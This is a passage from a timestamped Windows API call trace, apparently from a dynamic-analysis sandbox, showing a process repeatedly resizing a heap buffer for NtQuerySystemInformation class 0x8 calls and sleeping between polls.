Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.879] Sleep (dwMilliseconds=0x110) [0223.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.895] Sleep (dwMilliseconds=0x110) [0223.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.910] Sleep (dwMilliseconds=0x110) [0223.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.926] Sleep (dwMilliseconds=0x110) [0223.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.941] Sleep (dwMilliseconds=0x110) [0223.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.957] Sleep (dwMilliseconds=0x110) [0223.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.966] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.973] Sleep (dwMilliseconds=0x110) [0223.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.990] Sleep (dwMilliseconds=0x110) [0224.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.007] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.007] Sleep (dwMilliseconds=0x110) [0224.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.016] Sleep (dwMilliseconds=0x110) [0224.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.034] Sleep (dwMilliseconds=0x110) [0224.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.048] Sleep (dwMilliseconds=0x110) [0224.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.068] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.069] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.069] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.070] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.070] Sleep (dwMilliseconds=0x110) [0224.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.135] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.135] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.136] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.136] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.137] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.137] Sleep (dwMilliseconds=0x110) [0224.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.160] HeapFree (in: hHeap=0x2560000, 